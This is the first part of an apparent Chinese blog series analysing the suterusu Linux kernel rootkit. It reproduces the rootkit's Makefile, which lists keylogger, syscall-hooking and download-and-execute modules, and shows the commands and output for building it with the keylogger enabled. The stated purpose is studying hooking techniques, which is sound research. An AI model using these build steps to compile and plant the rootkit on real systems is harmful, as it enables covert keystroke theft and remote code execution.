Linux LKM suterusu代码分析（一）

suterusu lkm 代码下载路径：

https://github.com/mncoppola/suterusu

虽然这个LKM开发的时间是好几年前的，但是也是值得好好研究其中的hook原理，我这里使用的系统是 Ubuntu 14.04.1 LTS ，内核版本4.2.0-42-generic。

编译  -->  make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build

我们先来看看Makefile

obj-m += suterusu.o
suterusu-objs := main.o util.o module.o

ifdef KEYLOGGER
	suterusu-objs += keylogger.o
	MODULES += -D_CONFIG_KEYLOGGER_
ifdef UNLOCK
	MODULES += -D_CONFIG_UNLOCK_
endif
ifdef LOGFILE
	MODULES += -D_CONFIG_LOGFILE_
endif
endif

ifdef HOOKRW
	suterusu-objs += hookrw.o
	MODULES += -D_CONFIG_HOOKRW_
endif

ifdef DLEXEC
	suterusu-objs += dlexec.o
	MODULES += -D_CONFIG_DLEXEC_
ifdef ICMP
	suterusu-objs += icmp.o
	MODULES += -D_CONFIG_ICMP_
endif
endif

default:
	@echo "To build Suterusu:"
	@echo "  make TARGET KDIR=/path/to/kernel"
	@echo
	@echo "To build with additional modules:"
	@echo "  make TARGET KDIR=/path/to/kernel MODULE1=y MODULE2=y..."
	@echo
	@echo "To cross-compile:"
	@echo "  make TARGET CROSS_COMPILE=arm-linux-androideabi- KDIR=/path/to/kernel"
	@echo
	@echo "To clean the build dir:"
	@echo "  make clean KDIR=/path/to/kernel"
	@echo
	@echo "Supported targets:"
	@echo "linux-x86    	Linux, x86"
	@echo "linux-x86_64 	Linux, x86_64"
	@echo "android-arm  	Android Linux, ARM"
	@echo
	@echo "Supported modules:"
	@echo "KEYLOGGER    Monitor keystrokes"
	@echo "  UNLOCK     Unlock the screen upon given key sequence"
	@echo "  LOGFILE    Log keystrokes to a local file"
	@echo "HOOKRW       Hook sys_read and sys_write"
	@echo "DLEXEC       Download & execute a binary upon event"
	@echo "  ICMP       Monitor inbound ICMP for magic packet"

linux-x86:
ifndef KDIR
	@echo "Must provide KDIR!"
	@exit 1
endif
	$(MAKE) ARCH=x86 EXTRA_CFLAGS="-D_CONFIG_X86_ ${MODULES}" -C $(KDIR) M=$(PWD) modules

linux-x86_64:
ifndef KDIR
	@echo "Must provide KDIR!"
	@exit 1
endif
	$(MAKE) ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ ${MODULES}" -C $(KDIR) M=$(PWD) modules

android-arm:
ifndef KDIR
	@echo "Must provide KDIR!"
	@exit 1
endif
	$(MAKE) ARCH=arm EXTRA_CFLAGS="-D_CONFIG_ARM_ -fno-pic ${MODULES}" -C $(KDIR) M=$(PWD) modules

clean:
ifndef KDIR
	@echo "Must provide KDIR!"
	@exit 1
endif
	$(MAKE) -C $(KDIR) M=$(PWD) clean

那如果我们要添加support modules我们应该怎么去编译呢？
从Makefile中可以看到，使用了#ifdef来自定义是否编译support modules。
比如我要在ko 中添加键盘记录功能，make 命令

make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build KEYLOGGER=1

那么需要编译其他的功能只需要依次添加就好

curtis@curtis-virtual-machine:~/Desktop/suterusu-master$ make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build KEYLOGGER=1
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ -D_CONFIG_KEYLOGGER_" -C /lib/modules/4.2.0-42-generic/build M=/home/curtis/Desktop/suterusu-master modules
make[1]: Entering directory `/usr/src/linux-headers-4.2.0-42-generic'
  CC [M]  /home/curtis/Desktop/suterusu-master/main.o
  CC [M]  /home/curtis/Desktop/suterusu-master/util.o
  CC [M]  /home/curtis/Desktop/suterusu-master/module.o
  CC [M]  /home/curtis/Desktop/suterusu-master/keylogger.o
  LD [M]  /home/curtis/Desktop/suterusu-master/suterusu.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/curtis/Desktop/suterusu-master/suterusu.mod.o
  LD [M]  /home/curtis/Desktop/suterusu-master/suterusu.ko
make[1]: Leaving directory `/usr/src/linux-headers-4.2.0-42-generic'

成功将键盘记录功能编译进ko文件